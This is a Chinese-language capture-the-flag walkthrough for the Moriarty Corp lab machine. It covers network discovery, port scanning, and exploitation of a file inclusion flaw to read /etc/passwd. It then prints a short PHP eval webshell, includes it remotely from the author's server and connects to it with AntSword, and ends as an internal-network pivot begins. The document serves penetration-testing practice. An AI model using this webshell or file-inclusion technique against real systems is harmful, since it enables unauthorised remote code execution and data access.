主要考察知识点
文件包含
内网穿透
命令上传
弱口令
更改权限
HTTP协议Header
ElasticSearch-CVE
暴力破解
网络拓扑
写完之后把靶机的网络拓扑也做了一下
写在之前
这次用的虚拟机是VM_VirtualBox,第一次用,配置了许久,因为靶机是内网环境,所以有些网络配置需要手动调整
网络配置设置成如上,再次扫描IP,根据MAC地址就可以找到我们的靶机IP了。
靶机下载地址:
BoredHackerBlog: Moriarty Corp
渗透过程
IP发现
这里使用的windows的环境进行渗透测试,使用Advanced_IP_Scanner进行内网IP扫描
根据MAC地址发现IP,对获取到的IP进行端口扫描
端口扫描
这里使用的是御剑端口扫描器进行发现
发现存在8000端口和9000端口可疑端口,尝试进行WEB访问
WEB渗透
访问8000端口
是一个提交flag的页面,同时显示了我们的任务进度,首先根据提示提交第一个flag
再次显示新的提示
结合强大的百度翻译和谷歌翻译,大概明白了让我们从80端口开始渗透,然后在此提交flag,这个时候再次访问80端口
已经可以成功访问了,正式开始我们的渗透过程
据url发现疑似存在文件包含漏洞,尝试读取一下敏感数据
成功读取/etc/passwd文件,我们构造一下查看能否远程包含webshell
首先在本地服务器构造webshell
<?php
eval($_REQUEST['pdsdt']);
echo 'Welcome Hacker';
phpinfo();
?>
尝试远程文件包含
成功包含远程文件,使用蚁剑链接webshell
找寻flag和下一步的信息
在根目录下发现flag文件
在8000页面进行提交,提交完毕之后再次给了我们提示
大概意思就是告诉我们网站的web服务已经没有什么有价值的信息了,下一步需要内网渗透,同时给了我们内网的网段,下一步就是转发流量进行内网